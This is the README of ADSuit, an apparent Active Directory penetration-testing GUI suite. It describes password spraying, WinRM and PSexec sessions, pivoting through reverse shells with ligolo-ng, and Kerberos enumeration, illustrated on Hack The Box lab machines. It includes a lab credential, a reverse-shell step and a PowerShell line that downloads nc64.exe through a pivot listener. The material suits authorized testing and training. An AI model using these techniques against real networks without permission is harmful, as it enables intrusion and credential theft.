ADSuit - Active Directory Penetration Testing Suite

Overview

ADSuit is a comprehensive penetration testing suite designed for security professionals and network administrators. It focuses on enhancing the assessment of Active Directory (AD) environments, providing a wide range of tools and functionalities that streamline the process of identifying vulnerabilities, auditing AD setups, and simulating attack scenarios.

Features

• User-friendly GUI for effortless navigation.
• Efficient management of hosts, domains, IPs, and credentials.
• Instant session initiation with WinRM or PSexec at a single click.
• Convenient username and password spraying using CrackMapExec and GoMapExec.
• Seamless network pivoting with just a reverse shell.
• Automated enumeration and attack on Active Directories.

Road Map

• [ ] General

  • [ ] Improve Gui design.
  • [ ] Improve files management for the tool files including text files and tools incuded.
  • [ ] Add support for normal users not only root users.
  • [ ] Create a docker to contains the tool for fast install and run.

• [ ] Hosts Tab:

  • [x] Support Domain.
  • [x] Autosave after change detected.
  • [ ] Improve the design.

• [ ] UserManagement Tab:

  • [x] Add hash support
  • [x] Autosave for all fields.
  • [ ] Improve the design.

• [ ] Sessions Tab:

  • [x] Auto reload while changes is made to IPs or usernames, passwords and hashes.
  • [x] Keep the new terminal window open for user to see the command result and close the tab manually.
  • [ ] Add more session such as SSH, MySQL...etc

• [ ] Spraying Tab:

  • [x] Support passwords an hashes.
  • [x] Add instractions area.
  • [x] Support more than one tool [CrackMapExec and GoMapExec).
  • [x] Add dynamic dropdown menus when changing between tools.
  • [x] Suppurt multiple IP selection.
  • [ ] Support more protocols for CrackMapExec.
  • [ ] Add NXE support.

• [ ] Pivoting tab:

  • [x] Recieve a reverse shell and deal with it.
  • [x] Python http server in the backround.
  • [x] Cancel button to kill all running AD Suit pivoting subprocesses.
  • [x] Ligolo proxy auto config.
  • [x] Ligolo Interface auto config.
  • [x] Add listener to proxy for file uploading to the internal pivoting network.
  • [x] Keep the tunnel alive while dealing with other tabs using different threads.
  • [ ] Remove the waiting time for agent and agent.exe and replace it with dynamic method to wait for the uploading to be done.
  • [ ] Improve python http server start and stop times.
  • [ ] Display live messages in the GUI text area while initiating the tunnel.
  • [ ] Auto save and auto reload for both (Your IP and Network IP) to improve user experience.
  • [ ] Other pivoting ways, such as via PSexec or WinRM without reverse shell.

• [ ] Attacks tab:

  • [x] Split the window to two parts.
  • [x] Add copy command buttons.
  • [x] Add warning messages for all commands when clicking execute.
  • [x] Add Usernames, password and hashes dropdown menu for more flexibility.
  • [ ] Add NXE attacks especially enumeration techniques.
  • [ ] Add more attacks.
  • [ ] Give users more space for customizing the commands.
  • [ ] Create a file that contain templates for the attacks, users should be able to share templates.

• [ ] Privilege Escalation tab

  • [ ] Recieve a reverse shell.
  • [ ] Run enumeration script looking for low hanging fruits.
  • [ ] Display live messges on the Gui.
  • [ ] Run tools locally like windows exploit suggester.
  • [ ] Display a summary at the end of the scan highlighing the cretical and non cretical possible PE vectors.

Installation

The Tool only supports the latest version of kali at the mean time.

Download adsuit-1.0.deb and install it with dpkg:

sudo dpkg -i adsuit-1.0.deb

Install seclists

sudo apt install seclists

To uninstall the tool:

sudo apt remove adsuit

Usage

Start the tool with root privileges(ONLY ROOT):

sudo adsuit

Step-By-Step Guide

Hosts Tab:

Here you will input the IP adresses you are going to test along with the domain if any. Both field supports auto save when changes are made.

UserManagement Tab:

In this tab, you will enter all the usernames, passwords and hashes you found, they are important and going to be used in the next tabs. All the fields supports auto save when change is made.

Sessions Tab:

This tab is used to start sessions using the usernames, password and hashes from the UserManagement tab, when clicking connect button, new terminal will open with the session opened.

It supports three session which are:

You can also choose between using a password or a hash along with the username:

Example: here we used forest machine from hack the box, the user is "svc-alfresco" and password "s3rvice" and the session is made via WinRM:

Spraying Tab:

In this tab, two tools are used to spray the usernames, password and hashes to a single or multiple IPs.

Two tools are used to spray the password which are:

Example: Here we are spraying usernames agains the password using CrackMapExec with multiple IPs agains SMB protocol on forest machine from hack the box:

The attack result:

Pivoting Tab:

This tab is one of the most important tabs, its supports pivoting to new network via a reverse shell!

This tab uses ligolo-ng to reach the goal, it starts proxy internally and configue it, then upload agent to the host that the reverse shell came from, all done automaticlly, just send the reverse shell!

While pentesting, you might face a host with dual interfaces, and the second interface leads you to an internal network, but you still can't access it from kali. In this tab, you will need to enter the following information before starting the listener:

1: OS: The host that you are sending the reverse shell from operating system.
2: Your IP: Here you need to enter you kali linux ip.
3: Target Network: The IP address of the network that you want to pivot to.
4: Port: The port that you are going to use for listing to the reverse shell.
5: Upload Wait Time: This time is the time that you think it is enough to upload agent file to the machine that the reverse shell will come from, it depents on how fast is the connection, adjust it depending on that.

Windows host pivoting example: in this example, we hacked a windows host, then discovered that it's dual interface host, and the other interface might takes as somewhere interesting, so we need to pivot:

screenshot of the windows machine with dual interface

We will start the pivoting process with the start listing button after we entered the required information:

the termial will look like this:

Now we will need to go to the windows machine and upload nc64.exe and send a reverse shell to our kali machine on port 4444.

as we can see below when we hit enter, AD Suit started the uploading process immediately(make sure that you can read/write on the current directory):

The reverse shell will be recieved on AD Suit:

Now after waiting 60 seconds, the tunnel is build and we have connection to the new network:

We can now interact with the new network directly from our normal kali terminal, for example run ping against on of the new network hosts:

Linux host pivoting example: Here we have another host, but this time the host is with Linux OS, as we can see it's also connected to the external netwok that we have access too "192.168.0.0", and we need to access the "10.0.2.0" network:

Here are the AD Suit configurations with listining started:

The terminal looks like this:

Now we will go to the Linux host and send the reverse shell using netcat, once we hit enter AD Suit will start uploading agent file to the host:

Reverse shell recieved:

Upload done and we are good to access the new network:

For Linux, if you need to access a container on the same host, the tool will help you do that too! just put the container network ip in the interface field).

File Uploading with pivoting tab

Fot both windows and linux host examples above, a listener is added on the host that the reverse is sent from, if you are on one of the internal hosts, you will not be able to access kali directly.

To solve this problem a listener is added, to use it follow this example which will upload nc64.exe to the internal host, make sur you have python http server on port 80 on your kali:

iwr -uri http://10.0.2.5:1234/nc64.exe -Outfile nc64.exe

The above command will send the request to the dual host port "1234" that we send the reverse shell from then the host will forward it to port "80" on kali and the file will be uploaded.

Attacks Tab:

In this tab, we have two types of tools used, enumeration tools and atacking tools.

when starting interacting with host, it's suggested to start with enumeration, when you put your mouse on the execute button, it will give you some information of the tool:

There are two buttons for each one, one for executing and the other one to copy the command.

In addition, there is three dropdown menues at the button, so the user can choose a username, password or hash where needed.

Enumerating example - GetNPUser - Forest Machine HTB

Enumerating example - Kerbrute UserEnum - Forest Machine HTB

Attacking example - Kerbrute PaswordSpray - Active Machine HTB

Here we need to modify the domain from the hosts tab to "active.htb" and choose only a password to be sprayed with all the usernames:

Attacking example - HashCat

Contributing to ADSuit

Contributions to ADSuit are highly encouraged. You can contribute in the following ways:

• Reporting Bugs: If you encounter any bugs, please report them using the Issues tab with detailed information.

• Feature Suggestions: Share your ideas to enhance ADSuit by submitting them through the Issues tab.

• Pull Requests: If you're inclined to contribute directly to the code, please submit a pull request with clear descriptions of your changes and any necessary tests or documentation.

Thank you for considering contributing to ADSuit!

Disclaimer

ADSuit is intended solely for educational and legal purposes. Users are responsible for adhering to applicable laws. The developer assumes no liability for misuse or damage caused by this tool.

Star History